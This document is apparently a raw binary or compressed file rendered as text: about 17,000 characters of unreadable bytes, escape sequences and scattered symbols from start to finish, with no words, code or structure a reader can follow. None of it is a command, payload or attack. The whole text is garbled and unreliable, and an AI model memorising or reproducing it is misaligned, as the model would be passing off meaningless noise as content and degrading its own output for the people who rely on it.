���Aj+!uH���4<�\"�\'���H��R�i�w�y�\r�\"��\\qy�錼:W��Y�D�ƞ\"o�r�7�EHZ�tH\r��6�-�>�^/y0y�P�tg/F>�Ȑz+�s��S{�h��|,��|�Cz�\n�޻\0�Q(=��=��nO䳼�o2��2>�|	�D��o _o/D�%�F&��#�ں�$��R�F������d&���dv#3y�ώL�W�}�7z�3>��V!s����B\'��\'�?�fd~�2�2�h*g�U�G�\n\'�q�wL��Q肧�QE��bp���U�hD�u�ʤ\\T��U�ۊ.��D��A�¢�Œ��i�a>�j�F5���jT�O�����Tˤ�2�.�5D���:!���Ityg-��;��p8����EW�E�?�4�B��(�ք��{Q�(��0r�˞����M��&J;���\\P�8������Q��3����_D�*THiG��T���?�@EW7��gr�Xx�RQ�0T4]%|����A\rNk��>�Q�\r�XE]sv3�v��6�]�H��}�]�5y����څ��و���]��n���faC��4���D7?~��k�@��F���G-�D-��P+�����Ժ�:���jÊEwff�v�}�/Ծg?��a���	����3}�럃�3|���K2EAOԱ�6z`�>�n3�Cu�����8��y��R\rPׄ��� �cS8�q������-Г7\\ѓ�n���5�s�\n�I�G}���ү�DO��z�t��t�\ZdW���RA�/�^p�F/�X����@4���/�[�ge蕠\Z�J�\Zz�;�^ݐ������V4�g\r�?��/�G�-�ш+\Z�F$�7n��7J/�Q�4j�4*���m�ޜMFo\r�Dc�K�X�^4���ma��h�M\\T��qމ&m�A����k�Д�B4�s���M�|д�h�	4��0�1[�f�^�Yn�ѻbW��\"�u��R��Z�hμ1���9��&}�q1�+�Cs��\'�h^�Z��-p�E\r��Hw��Z�g��m@����%��hi�6��nZ.߇V���e0Z�ڌ��b��M�h}A&Z�2mPjC�hӗV��*��6}��}q5m^��\\�B[z��V�0���Z�}힊��?��\'i��E�h���ن�]�}�~+�>��b���J���%h��=\n�VG�lv�=��hϫ}�G�ګu�����E��`��D��-�ϯ-Б5�蘬\r���Z�~I��~�tA�+���DB\r:ɜG\'���)�i�G����O�<�g��y��~������y�����й����[��X!�2@�ɳ��T9����RŽQ^��.����ܐC]8^H]�iL]�����O��GQ�л�K�]�j�Q�*�Q�?j��ZRWF_���v�TP���T\0��?\n��ET�G&�\\|�\n�8I���¹7��**%�����AE��5vT�-{*�͒J�������5T��wT�B7��K�v�P�#�T���}�KeG�S9�(�sn��fP�mnTn�w*?#�*��Nb*T<ݗ*V;@���J`�*�բ��E�U�T��)�A�o���+���q����h(�j��B5n]J]��O]sĀ�.�E5�{�j�N�j=Gݼp�j���e�:u�D��qբ5�j�S��m�r�Ճ�T��b��-��+��E�5ԝ��]�#Tۆ�T۶/T��e��A�=�4u��i��˩�RR׶S�>S��\\DuVҤ�m���U�S�-(T���T�!-ꑅ۩/S���P=W��z��z6K�^FjT��6�c���=��z\"��z�K�{h\r�G�\n���7�ϱ�T�[���ܷTߗ�T��T�u��~iO��q��SY4����=��g�LQB<���\"��:nR/�?@��lA\r6Q��q��—Q/+Q�W�0�=Cԫr�ԫ�*��\n���*��q�k���Ѕ���otjX�&5�<5�l5B��z�&5*��\ZU��\Z�7�z�t�zs��\Z-S��K�1���X�5޺�\Z��BM0�GM�7�&:�P�=��gr�)�5�T�~j�=.5�~<5�4��~�����F�ڮB�W����-�� e��ES��L	��\\)5�?���j�q�2�q.���]:57x-5�=�Z0?E-�t���zP�\"T��S��˩�S+����+\\�6���6r�P󩍕�&CjS�O��.ꋒ���\"�ͱ\n��Jj˨9���e꫽C�W�_�m�7Q��j���P�SL��5j��U�wY|껗���R߯l�v��R�6�S?�5�~��G��XD�;O�oXG4u��tR�\ZS�����ﻨ#_⩣�G����1���q��o��S\'�7��ݡԩiK�4ɟ:#w�:TRgܮSg�A��U�?*��?o�sE�s?���ߠ��P��/��;�:o�L��?H�;;B�P�ɇ���Th\nCki��4Řy���4%�o4�C}4�Oq4�o\\�J�\rMe�8M��-�z���\\��(fm�x\"m��6���I����ޣ@�8�J�8����H�,��-ὡ-�~N[�|��E�Lӊͣi���YӖ7f��L��V�ޢ��i�m\Z}��[A#M5��k�h��4D�HC�QRiԬl\Zݠ�Fwס1L,h��.\Zs�v\Z3i7��P����a�#hŷ4��$�����}I���i��4�\Z?�M��&�J�	�\Zh�Ɠ4��4Q?MfA[U�@3Tҧnw��;O3J���B�5���ik�\\��7���v�����mD^�6��hM��6��L3��if�3i������i�il�y�m�KmK|6�b�f�0�f9.�m[�Cۖ���}I�fe�����ʣ�k��I�]\\D���ىSh���i��\'h��i�v54�\r�=W���{�u��2i�\n4�2O�˃�4�g�47V�-h1���}�@;�_O� �yީ�y�h�\nh���|.��V��S ��X1��<�<�vf���s��Ȝ$�N;ww-���g��A�hW�]���\\�J)�M�^IҤ����E��m���e��H��|M��SH����V�5-�2�v�����wƁ���������[ci	��JZ³tZb�;ڝ���W���aZ2�������Ԣ�<FK[�@�8oD��;H�ҒвV�в.?�e}���=���)ܣݏR�e�Kh�wh�Zi���q�h����Eh�r��hO���\'�iy\0��?��Vhy�VUC+|�G+Z�B+j��@��Ciš�i��JZ��\'��F�V�M+O���G���7��EZ��JZ��VZ5�/�&2�Vs��il�խ�Dk�W�5t�=54�=_��9ڋ�S����h/���ZV��Z���Wr���V�h��N�ڼ\0Z{�Z\'݌����9u��6֟����m���\"Z�76��d,�Ck-�w�NZ�\'�6���>q�i�$�h���i���U�h�_�цC�h��������M�:@ykHg;��w\rо�*Ӿ��Ӿ��}��}��D�J�M�WiS�$ڏ��)�6ss��+CD��I��U��)=C���I��^A�C�i�]�\nOnҕ�ҕ��te=[�\nTCWq����Bt��et�ɗ�Ŗ��g\n�K�\'�Zz|���G�e�t�]������}y�	���k��\n]om}@��X�G_yl}�G�m9t�\'�ޡ�{�t�M9EG��S��Ԁ::��\':}A��EgT=�3�/�Y�W�M%�ʢ��$ӹa\":��r:oY���)�7����YG����t�F�t�]v������nxr��b��s�n��\0}M���V���VRL_����N�}���$�\'�dގnz� }��>}}�}�ޕt����f�_��]m�[���-��ӷfs���ѷ�Lѷ�q��_;�wHl�;v:�m�vM�t�i�����O���.�%�,>�ɫ��A���Jw�ʠ;�H���ݠ��v�<��~�s\r�S���Lwǿ�ݻv�wE�OLЏ�o�=m@�\\��B�z�@?�J�{�Qt�S�b��w(ݯ6��M?���~J�J?�@��M\\��Փ���@���{����9�/_S����b�t}z��)=B�I�Ҭ�G�%�o�ң���j_�����|����z�)wzb�jzby4=q�-=�)���BO+룧}4�gll�g���3>$�3���,Gc���Tz��.=��g��?�-��|�?�9F�]�O�˷��xLϛI��?]H/�?���-z�Q	�0�8��J�^|2�^�	�K87��=�g�eƉ�.z������^U�J����^Cl�נ��\Z�Jz��<�v��VGD���Jo��Л7қ�?��<�Go��	�W���3]�ߩ��LS�m�lz��.��\'���B�`1���7z�ezO�Vzϕ��~���}��}	\n��\r�~�jz�9}`�C������k�#5%�/�N�/�>ѿj�п�{O�����=��{��Tj�\'4=�1E���A�d�y���w�5����_��k��w����C��h�/���}L�w�1�2��^2��72��,f���d,|,�P;��X�%e�Æ��v����{�%���%�=Z#bƲmڌe��1�-��)���c��(��d�.�������r�:���:kf��D�9Pw�A��c�&�Jw2�򌁼hfPG3h�$��.w�AOAOSY��<��`/�18���]�8�!������3DnCt߉!�aH~�0��O�.����j�ƪ+�������O1V��?�?bn�a��1�/?c��-e����0��a��c�V9�W�a���ؔ2��TBdl�\nal���ؼ�����>��1Ɩ��ː��b��c�kgƎ:C��:İ*;w�`��a+�`؎0v�-b���p��0�:_g�-��ؿ5���\n�NkƁQo��0��<��8���8�c�8X��Bn�n�4��xƑ�9�#�7G��ax&S�o;Ƿg�q�q��o��z�ۣ��#\'���\\��a2�����Ʃ�x��eq�3�rgs\ng�e\0��A���W�_�A.Ռs���޹2�ծ0������]��fk�$��sKW3�1B;���9Fx�$#��Lj�Ǹ��.��7�M���F�v��	F��F��XF|�OF•|F�� #��aF��;F��#���Hm�g�A��t�9F�����r�����q��Ƹ��f�-+d�-`ܻ��q�,����x�	�a����[��i�`�e��,b䯛a����(�c�3\n3-E��r\'�5eA%)��f�Q��Q�;�(���(_��(?KfT��<F��=FŗfFep��9�Q^ƨ���Y�ɨ	b0j�2j�\\`�.��h��f4b��\'�g���f�(F�\r�V�.�k�N�k�������=w7���(��ӌwZW]�F�u�ѭ��ѽǗ񡼅�2�W������[�h�c|�2>��e^Vdv�2��<��@,ch(�1���1ܓ�?�5Dc��1/�W�:����Mv��b��}�U�.dL�S��S��?�2~����K��㌙�L���o���]�_��:�?�d�luc�3�1�(d̹�1�ާ3���3�6��t0���1��1��2d#L��R��#�r�)Se@�T���T�b.��0�#1�e.���T�g��X����%0�>0�6�1�ɖ3�i3u�3u⽙:�N1��&0���L=VS�s�y\rsœ�̕��L��=��T�����Lx��	��a\"U�L��:&�V�dʝ`2�i��.��a2�K=L�…L�ɿL���L�c���)�f1k�3�嗙x�r&^q�)Ja�f�������sL�g檀@��8�7L����JLC�!��4�tg\Z�0�ն0�)IL��ML�%�LS݋L������.�2͎�07�37{d3�h�2�p_2����[��0-�3-o�2-�obZ�ran�2��d��`��IIf�ij�;;\\���;���FL��L�ok��71w;�2�?`�Jf:0��ǘo�3�.�c��]��\'\ne����43���e�x�tj�b:[,d:_He��_ld��tӼ�t_x���t��0).f\n�gz��y�/��a���H&3=^�`z��fzY�3��ڙ\'�G3}}���g3O��2O���<t�y:�y�}�y��a�ي^f��|f��tc�y~P��g�y�!�r�m�����+��!��̐_b��0f��0fI��*��,����qc32o7��af�b2�V���36^�������Ws����1�$92��(����)�<fj�bf�fj�3�2�L�>�L��g�{t03o�`fu0�q�3���1�K��O1y�1E,b���̿Eb��cD`��1��ʙ�3��1K4?2K^R�%�5̒i1�\\m�Y.ę�ݻ���c�5���5�������Z�%�z�8f���lH��l��f6�0����Mv̧����^��}ߙ���/\n��� �u�)�}�Vf͓���|kq����컧�����=�p�`<���2��G�C6o��V�̑�1��_�JsL������%v������M�P�~��9Y\01�֨1<ΜY5�� ��;�9{N�9���9;��97���G�9ߛ������ mg)<�c)Q���5XJy&,��2��\"K�FKu�a�����b-*�b-^�Z<��R�z�ҀY\Z�<K#�(K�`	kI�k�v0K�(���e-��tڱt߶�V�o`�YD\'C0^�ubX��\']�aQM�Y�c1,��?,��,��,��m������b�U�X���X��,�2��ަ���8b\r/�>�o���qr,�HK�%4���:Yx�K�ː%Q{’h-`ID�X�$Kz�K&eɜ4Y�z,�E���^�j�-k���,����5�fXk�d�[����މe��4�,��2?��eq.�ey,���h\rk[.�*��ڎ�em�y��{��l�X6O��t�nd;�*c�mg9[����Xο/�\\�8��@���ۋX^^+Y\'��|��Y~c�,�^���R����c�b^Qc��Y�㝬��&��G�wϲ.�{̺$�b]��e]�na]^��z�b]\rNa����Z���	Y�e���-u���7Y�����+�ƚu+�+zQ7+z?�}/�u{9��.��𓕸c5+�����i)+��J��X�=��܃��(�����\\���)��.�ʺ���zఛ�����(	a=�*c=9�������U�*�f��c��e�Y��ݬš���BV1��x=�*��f���g�/���^1s�U)��Uu0��XU�ϱ�/v�j�i�jW��jc%��kKY�������tV��4��z��`=3Lg=7Sg�p�`��:�z�ώ�����\\��je�a��=�z���͟�;�=�{�_Vł���������[��5h=�\Z���\Z���\Z���\Z�d�F��Y�a�Yc�׬�� klc�ww�����&*XSZJ���q�TK\'뇚kz��t�w��/�5��f�̔�~����	�@֯gѬY�7k�r,kvf�U(cͯe���棻19�L�� &o�S����?�M�1�yS��T)J���\0[h��-_�-:�[ԶS#�aj\n�f/�Ԛ���ʉ��LC��4�0́dl��l��lIB�u��JZ�-�8�NW?���.l��1��у�P��Vl��V�`+�展.bD��J1  �1Ҋ��v]����h�l��`��{kɰǨ!%�+F�n�ї8b̔Q�9�cm݂�-`������<�ƸA���y��q�fb��9L� �~�D�\Z1�H&�։I��`��V-l�V���pQlu*���Č�i`F:f���Wnj�s�����;��I���S�ִ�a&9�0�eN��!l�uf��4fn�\Z3O\Z����a[�aV���#6f�����v^a;��0�?��)ۥ�\r�mR��\n���0l�����;�p����ۻ	s�\"��*yl�Nl��!�_U��\\�肹p�b.��A�s�\Zs�>c��~�\n�^�;\Z��Ղ�W�߅��ñ�#}�������a;�݅�Zk��ݢ��=�ag?Ƃ�a��T,x�2,��\'vI9�D��]:�]�7�Bޟ�����)�Ǘ��;[�{X��\n��n�a7˞b�Y���,��S,V�����w��%\\��B�b�E�3׋ݡ�bwRcIW+����X\n[K���4�/,�o��T�e:7c��K��E,K���p�ڣ�e�����ð{�S��`�3��3�p	{�o�=���r�*cO���\'�QX~�+��aM�X!샕8c%\nX�Z����h������\r&Xͅz�Vb��ec�K`\r�5��B����kT�Úb$�Si��5{�܅5�a���X+�k��ڈ�ͥk;Z��5�z.֡܄����oðw�۱����&�Xג�X��fM`��c=�e�G��X��\Zֿ��wB��c�ا6wl�HA���ؘ�����v��.�}_9�}?��}�z�M�ObӐ6�w�ο��D^�f��b3��Ϭ��\"���\'�z4���5�w�M�o�%����3����+�a�m�g+g/���^��^p~���qc+�ͱ=����c���l�+w٪Z�ت�E�E�l59���Ɖ��������������-l��\n���=lm7y��w[����φ�k���;����:��+Re��%�W\\C�+�K�+^]ef��[6�a�&�m`�����-Oؔ�8q|�F��?���l����ʦy��iC����l�N2�پ��*�bc���|M6�ޏ��b�+�8���߼���e�]������%��Ҥlv�-k�g����_��\rl�����\0�h�$�hp9�b{�i�mr\nc����Mß��Hd���d1��4�fo69��pa[n�Ŷ���VNl+#����m�K��~����ٟm�ƶ�^Ķ-wcۙ��U�=h�υ�Wn-{_h{�:{��1�����b��ZU���Z�����2����/�}H}�HU+�cl�}�y�}Lo�}\\�&��ؖ}b��Dv�Dw��2���r�/S��[T���c��.f����}f�$��K������/<�a\'�/�6��8}d_���W�w�C�?�!�d�0���Ȏ�Ž�Pg�fߚ5c�6�g߾�Î�g�1�q��7��#�q�W��o�fB�I/���\r��4+v��v��o���B�ݷv�{��ގ-�{���j���4�����K�uj؏(U�Gv$�c�)����\'��\'E�b�9vq�]��.���.y��.}Pͮ44`W��U���jT̮�ZȮA��V���g��/$����L�݊\\b�\n#�������m����n3�b�g��Zg�7��;���[�2�;�:��G���=+��=�!�1�ؽ��}��[����`	���[��;��ѫ���b�;�=Vq��m�-�[�*{�<��Tc����Q���b	��\\,{.p{�f{��5���7���0{�B�#g��#w�Ǒw�(0�pܞs�.�(��p���r�W�sT|!���x<�FsTs�8�߼8�p	s�Ɲ8��ws4.l�h�m�hĿ�h\"!�%�-�Pβ����\0�Β ��!Ί����8+��9+ۣ8+�28����!�9$�Mh1�zp�d*���9��AF�9�6��)�C�>��;�q�{9L�y3�����a�Y���9�[\n��n/��ß���A�0WU��Kk8�f�8��#3S��6�sd>�9�^����c4q�o�9��Z�5�u�uԥ�}:���-g�zs�F7��`(��KgS�������c�\'g��m�\rVű����<ϱ�α����]�ʱ�\'r�6s�M>��g|�P���y�q9��qՔr�j�8��Vs<�Vq�n~���Up�\Zs�Ih��W_rN:�x�{p|:�8�Vt���V��Y�)I9��3�Ӂ󜳢P�Yw���N�vι0��s��Υ�&���՜��tN�(��q��>q�+\0��3Nd�%�\r�)�\r�΍����<�s���m�ù\r���*[qbo|�Ļ��$h�q�p�Wr>��$>Y�I�o�I�V�ȟᤄ�sRnDqҗ&q2G�9YY���z�{o�8�&J8��$���9���i��#��Q��J#Σ���\\�vNn�SΓW_9y�~q�^Np\n�+9EF9Ŕ\'���8%�c�R�N�hNy�SNũN��5��lƩI�ũ}��S���~�nN���q��i��q���q�&p�z�q�)l�<[�y��y����B��b����g��Б�*À��-��pެ�8op�\'�8�/8�S79o����I9��p�o������}:���9}�˜��n��e�8��5���&�@�7���Oew9���8�^1�!���a�	�0k�3�?����+��}�8��\'8_��|���|�™�$r&�7r&�9�O�8?V�i�2���4��1�Tș�)��yz�����U���U�g�U�p��L�>l�.Қ媛��g��j*|�.��jor��8su\Z�q�������su�\\��\\��T�\n{�J{.a�n.��K.�u ���l.�/�w���g����q!yw.��%_yͥ���R�����..3S��R��Wjq��C\\^m����x?�\n\r�s��Vsq�\\�\Z�Jp%�Lq�������k0�]�q��:����z��zP�k��\\Ï�\\㼧ܵ�u\\�g��۷s��<�n�暑�p7��q7�\Zrͯr��r��T��v\n�V������\Z߸���r�?xr�����y��uȏ�:�p�:�s��z������rø�Oz���m܃��܃u����׸n�/pݷ��Jz��C���#�\\O�s\\ϊN���	�)�{l�^4��Ο\\�L���v�)6��|�L�9���S��ݦ܀�?��cz�����Gn���%M�x]�)6��u�Z(�{�ۄ*�\r=��\r-m㆝�\r{��{�q#u�}�܈!=n�o.7�ώyc�{��$7j�K�2�V��mu�{[y�{;�(7��unl�?n�IWn���po	7��\07qW7q>�{G����M���&e���M\'+qӛ�H7��\Z7k	�͊���5Y��k�ɽ�/�ޭ�p�/�ν/<��N�}@��>\\q^��}�����2�����[���d�\0�Ɉ7��-���Nܢ�\"nQ�\"n1j�-qr�Ys��ܲ�~ܲݮ�\nCSn宽��\'���Sܪ����ܚ���Z�\Z�nv�ީ��pޚ���۔\'�>���}�ś�<�3�y+��B�;��=�%����H1�5)��f3�m??��0��v�J�vL[r��Թ]��p?�A܏wr{O�q{�+r{�E�޾��>�.��9nt����;�lw`ʚ�Iu��k6w�I�/��{�p�k���/�sG�rG~���]�~Qcp��N�~����Wǝ���sdTrq��l�3�b��x?���&s~=�������2���z!�O��9�y��>���N���2��YO�o��2O1>����S�n�)[��-��-�2⩩+�/X�SP�S�~����[����mu�����[�W��e���U��V>i�������\nx��<�g-�|\Z�x��+����P��q�Uy��z��Ƿk�	����<����ȓ��d�v�V�\\�[���g���\"*xF�;x�6�y�G�xk	��u���!o}f\no�}�\r/Bx���[��6�K�Y��ͳt2�YV{�,?<�m}D�m��o�YE��3��l�+y;/*�v^~��e|���V���3���1Ϯ�$ϡ�>o���}�q�}Jx�N\Z<�k,��O]�A�N�yg�+o�����}�;�wT=�wtb\'�+���d��U}���s<��y���]�_v��\0�4��;�ёph/ b/(ЋT��;���w��}ޅ�L^p�5��eOx�\\y�_�]Cx�\r�xWثxW�syW��xW��4䅬Y��W�����¼2y�^����y��\\��8v��#�u\"�My�������zȋy�ċ}(����x�N����y��ޝ�$�N^�/�侇�ǽ��do^�\\/3x/3�/k�	/�$�w��!޽ԇ������o����ż�jy��x��jy�M����i�|����yEwTyŢS��\\�W�1�+�}�+s�������Kn�*���*2�y�jt^��?^t�W��ƫ����>�Յ���I[x�&^�s8����k�������׼o�%z��\Z�x���lry]\r����y]�>��md^��ݼmއ�=�/��zLy}�`^ߚ#�������~���O���O�x�ν�\r������\r�xC��y��B�0b�v��\r���>���>���z���V2�~�ϛX�&���M�Xϛ�b�)�ߟ��|���2�x��N�95U��QK޿?�1o~b-o~ފ/�L��_\0�\n:�\n��Jzb�R��\nP�W1��D��Uz�|�����������|5�j�ں2����V=�W�2�k��\Z�>|�._s�&_�c7���,�\'_W���Z�:�W��,3>q�>1��d-��.󡓖|X݈O�����⣄A>J�ʧ.$�`\r��Ƨ]��3\"I|Ɠx>s�\n��~���~�g�~���s����+d>/Մ/H�����%��{��l����|	=�/5k�K���^�|����UAy|�m#|���|��?|�_�|��U�56V�5������שL�׭t䛘��ק��7�?�=�⛕��fu\"�Y}-ӛF��ac��s/��;|���mr*�m���V��|�3��ٓ��GB�;#=��l��]��|[~��0�6<��;� ���|�I>��C�C���*���a\r�i[���*��s�|7���6�}W��Q��:*�c�ߣ ����<߫��lG\"���4��Ty��u���s|�Xu�O�U��V%��Ԏ�Ӛ�p��r/��S\r��M�@�K��������}���~c�u�?�E\Z?b<�I�Ǐ�?ɏZ��G�i�o�*�ou��G?��_����Ï�������0?�Y����D~�\'q��IF�i�N�ӗ��3����Zʿw�����f��?�����<����E��os��t��f�P;�_���_�V�/���/\r�?Z�/�䗾��WX��W�������&S~ŷB~�~��-��\Z�W���kV�ױZ��&~}�������[o��2�-��-3���CM�7�n�;�;�����:���~�w��?�)�?���W�l����N��E��}�h����-���G��Q�g�1�����G�f��R��f�����/5#�/���_W:������q��n�o��o���os+����\'��\'o��u�^N���k���\n�ύ�?\'���������S�ǟuB�s��s��������q��P�@a�^��_�X#(~�(Pa��X�T���9w�^�,:c)P���y�\ZCG��{�%�Z;���hϞ,��@�{.G���.��	V0�\nۿ�q�\0�V\0�|* ��* ��	�cog�b�\0�b/@X�:uL@[�A@K�06	�\r�,�\0�]/�n��R��s\'j\\�[I�|#|�d��f���G xg.��ѓ\0��{F ɍH~/�\"��.�V��%0�|(06�k����K,�������p��:o��3�\r�`���r�\r�O6>:\'03�\"0��&�t5A`�G`�\n�>X)�֔!��X��%�~�?7�gt6�I�˦�]�[�w��VS�]��S��^S��n�`��}��:��,~W��;	�5\n�/o�n\nJ��҇�7m7����=/BpX1Yp��Xp��Bp䬞����e��Eq/��/_��XQ��x����V����;�\'�纮�\'�I�K��o��l����h���s�G���4�������i�er��ra��Ϡ �\"Opm�I�> ���Tp]�\"���D��R}A�U�����B�-�`A�LAt{��v?]c�7Hs�L��\"H8E$l$f�	��e�$�$AR�� �?U��z[�2�H�Z�!H��d.\rdrh���@�}�L��L,ș��\r\n�<�-x21!Ȼz]���}f�<AѹA�%���E���&YP��t6LP�		�Q;Ay����FAe9]P��CPՒ �q�ԦX�GB\r�PAö/��\'!�&�:����\n�9.x�N�*IК:\"x��*x��M�Gоp����S��� �~\'��.xg<+xwQ[��ΐ�]���M��/���A7\'R�mp[�ᨇ�\'�@�s�N����〇�7EY�w�Ð����Ӊ\\���>��m?����s��}g#yy�ѕ)�q�@��^A0�?&��7\'���)���L~�Sn�ߏ~L	��?w�tI�.����fM�	f���i	措\n�*����%���\'��X(�vG(�n �{pP(��^(�/T��i\n��.��!\\�-T��.��\\��}_���P�}�Ps��Q(Բ����Z¥����~�Ƅ�i�P;�M��$�=tB��L��x��@�\Z?\n��uB	I7	Ɇ�BxK��b$��5�!��\'�U�	{\\����Bla���(��B����Nr+�\nEN�BiE(sx$�M\Z��w	\r盄FDU��Xhd�^h�g\'\\+�	׎�M2��z+\\8 \\7.��*��N��p�n�����<�Rh��/��VZ�ZN<n�Y(��E�m�Nh��Rh}\'B�]�p�Q��F��fU�p�E����p��]��n��>e�о���E�^x��@���5�˖F�KK�Нh&t���\"<l�Hx8�Yx��oᑵ�B�@���O��sE��õ�cVy�c{��\'>�	OZmzG}�k�?M	�hf	�ԯ�\n�AgJ�A%#�s�[���K��G�‹�K���E	/��^1�\"��;-�� �2�[x��Bx�Tzh�0,S$�+�?#���	o,[\'�A} ���S�;H3]\'���c�	5�m	�;��Ii�d߽”&P�VvS��6O�.�\"L��\'L�f`�������^���	�o&	l[.|\">�>��$|ذ]���_��a�0O�(�;�	�7\\�_�#̟����G����{	��Ƅ��Qae�5a�ڮ^�+��Յ��56υ\r���˄�#a§�����.����–�–���=�W�!�״{�7A���f��P]a���wk���	�4��]m�®�Jaw���g�Aa�n}a��Ua_�.�P�r�v��q�����o�ϋ\n?o�~;�X�-�@8e\n���(\Zj��\\)�u�p֌\'�;> �K��*\n�����Ο��W��r�{p\ZW0��+�=�+�~���V�U�6�?���|����o��K#\\�EW\'��\Z�]�Ɓ|i(�tr\Z�a[�:��r��K��u��zK�p���\n�8�R�_�����]�㄄�8�\ru\\�a~#���ѥ\"�\ZMé�~�.8�]�G���ΐ&���q�eC�ߊc�\\p�J�;ց�δ㼚�8�n�����qA{<.�g��Q�q����銋�]���Gq)U���e�\\&����ⲟ������q#�C��7:d���kL��kܦ�5S�ڶ7��q7�z�-���S|=�o�	�7���7�;���f�-p��D�,l�)�7ۧ��:ŸEYn1��-͛qK��)�V��Z)ŭv	qk*�o?��m��M��	ߕ��jw�w���mc�p�\"\'|���������r/��|��w���F�{5��z��}Խ���\'�c�|��_���3����V�;]��.�\r��pWB�h!���ڰ?��?���!ډ{���{�}�{V��N�^�p��K\r��u<@ƽ	��-G܏�������u9~��W�,�?�#����\0x?6��\\��\ZŃ����^����sv~�H?�=�_0\'�j��p:~1�/5�/�����O����ݻxȝx�t���Ყ��\"�Xq��x��G�~�߈9�Gi��޾�o�D�Ѻ�x|�?<�tO*>�\'˫�)�?<���ُ�����\\�Y����.���-~O�~|�?T��s���z	�h�?ك�;��y��3G�-xQV^�2/�m�c?�O�?��0/�>��N���x�)\n^�D��6�k��x�����7��ǟ�;�?ϐǟ\0x��5��7�ڊ�������q�k�i��Xo�Z��Wn��Gn��	x��|��_�6�;t��»L��z��U�[����x��l��FV������>�؏]��;��U�e����)|��G���_VR�\r�ד;��>ᓬ�T���\'��x��ŭ��\Z>�� >��m�\0��=������sk����E�N��{@����b(R���6��\"KEOu�^f�����m-6\ni��-y�Z�dJ ��Y����iݽ\'Z�4.Z\Z�A��T�l��hYn�hY�L�C� �	�-�[)�u�����i�Vp�E+|�d���Y#\"<; \":ω@��ܡ!�&1���TQ�9�(B��D�T���K1*����D��\"Ε1g _�UPqc\"�\"oq��Ǭ�2��xzD|=��=��H��U$ ,	�CD���\"���H4� �uu����E�M\"�q-��\"�=�\"�΋�5;��ք��֡�\"ɜ��x�Ȥ�h���h�1�h}�/����\r\\\rцu��\rGE�n�6vN�6�^(2#։�v|m2	m�� ڲ�G�%�_d�j(�X�\"��%�\n����X-ڶ�]d��Ud��O���.ڵ�Jd��Ud\'�\"�R\"ڳ�(r8�-rHI��\\+�G[\'ڷ��h_�1Ѿ�����)�%\"�g�D���<��D�kDE��س\r�[٢e����j�I;W�ɸw��\rA\"o9+�w�s��Se�i���h��e�3�1Q��i�9��(X�(��(�S(\n\r���ѥS����k�.�P�^QX�}Q��<Q����:k��J���D��#�x����Ǣ���E�n�ݦ�D1�jQ̦nQL�5Q��Q\\P�(Q��莩�(�!J�:��+����Q*��(5�K���$J��D�{�E�7D�iE�U4Q�����kѽ�gE�|�E��E���,D���4n=�+�(��\\��&���>%ѣ�E�	QњLQQ�Q�gQ��sQ��QqX��d�Q�����뱨��**�o�wN�*G.����U��jd?D�jlQ?NԔ�=�0=�/=��=ϖ����Z<E������bD���36�:�袎�F�;ޔ�]_���7���,_�ݲC��[�G�\r�� \Z�\r}�w}��U4b*\ZՊ����:��B�DckD_��E_��������ݐ��̻E?��E�Zd�L��O���wb��O�Ѭ��h��h��\Z������a�X�7Y,3\'^p�C�H�$V�;(V�ŋ��ċڈ�,ŋ�4ċ+8b��/�\ZLw�Fb�X��.���J�R�2�ҁa�%Abm$ֱX!��^��J$ֳ�+^��%&��������b����\r1,�õbx�MLq�S����41�r����!fP11C�.f�g���#��41��[���.�2|�l�!1{xD��pN�[L� ��wE����Z��g����1n�*���N�K2�Œ�?b)rF,��$�\'�����c�7]���ū]TĆ[֊\r��\r�͕���\'�k�*�뮠b�{�b���b��x�I��x��V������.��\Z�b�v9�٧���(�y�������ko�%;Ll)m[�2[�[7���;Ήw�P�;���|�V�k��V�Nl�G��JSl��(�s�V�@t;X�\\������\\X��;�N����z�b?u�\\��UG vC]�n��ć��Ň�k�G���=�{=�_qH|\"VO|��d~��{w�ػ�0(b�{�ž�i�S�B�f?񩩭��ħ����x&���&���_�R�\ni�`~����F�ՐVq�Z��8��Ef�/�?7�[��pq�Hy+T|C�8���ͬk��[W��Yű���q�;��֟��A��=�hq|�%qZ,N��/NH�/N�k�=Jĉ��;\n=�;���I��Iw���\Z2��չ��h�8� \\�N��_*gTE�3�|gY̊��3�wW|�5�,�_Bg�͈�����Q=��a�c?X���)�}�G�����8/�y�+�N�Ņ�\nqa���p@Q\\4�V\\<A\\�∸L㹸��uqy���\"5X\\ٲC\\��P\\�Q\\{k��Ay���q�3�]�g�s�g�p���\Z�K%%�K �\n�/���������[8�������ׯ��mo��m}>�7{T�����dq���\\�F�Ni��ko��k8_�a����^��ÉqOa��c̨�cv����H<p�[<t��x��E<��&�l�D<�RK<6�\'�M���ēf��\n-����?��3\Z�♞r���1��\"��g���W^��ϩ��?�\nij���s5�⿫���]h�S��w:K��K�OH��Jq�D麶D鑪D�����F��\n�Du�g��\rC5_�J��l%���$�g[$�;$�owJ4B3%����%�K%ZNY��cm���^7������]�k��8F��K_B�.!:�K�s]h�=	��E��H`-Dӻ%��5����q	}w��a�Cº�X�q�J8k$�͗$�=�ޜP\"��+��xI��I�UZ%h�����pw����w�1q�ĸ�)Y#됬iO��4ޒ�n���\r���]&YO�&Y߃I6�\'J6]L�l��K��k%��f%��XH�t�I�\rkGL���u����7+$6��o$�����%�՞�؞�؞.���J�5Kv+zH�O=��ל��1�\'q�o�8�\\��s��>!q�D�8[�J\\N$�J6OJ����NI���%���%�7hK��H<��$�|�Q���/KrB�PrҨKr��[�_�� �	��2�$���g��6^rJ�����)�i����O�$g� əۇ%g>�%g+$��$�	��s��s��I��I��씜+�IΫ=���\\(	��/	.],	�%H.�H���J���IB�3$a\Zɒ��DI��I��亥�$�԰$�q�$�\Z-��\rJ��$7e���.ђ���%1Z$I�:KI��2Iܡ���`I<�)�s�V��U����KҠ	I���$]�$+3Q��$Hr�*M�P��ᬚ$���j��F��qE�k�\\�}S�� ���H\n��$���«ђ�xSIaҬ���h�RR�{,)I�%��ޒ��1I��CIEx��2礤����J�ARm�%����.��4�\"J\Z\\+$\r㪒F$H�8yR�t���)���i�P���(�|9#i^\'iQ�%i)�*i}K�v3B�f�I{��������佋��}�C�)CI��|ɇE)�m���D�#�*���/��{#齬/��ז�.JD_%�H>��K>u&J�V�J�7\\�[NH>J���yJ�$c��������%���I�_0�LhޔL��$���d�n��H��?%�O]��PL�믒�AP���\\����@�ߒ.�ߩ/����R9�T*��H�tR�p��ta�D�HiN�Q�.:�]���C�f� 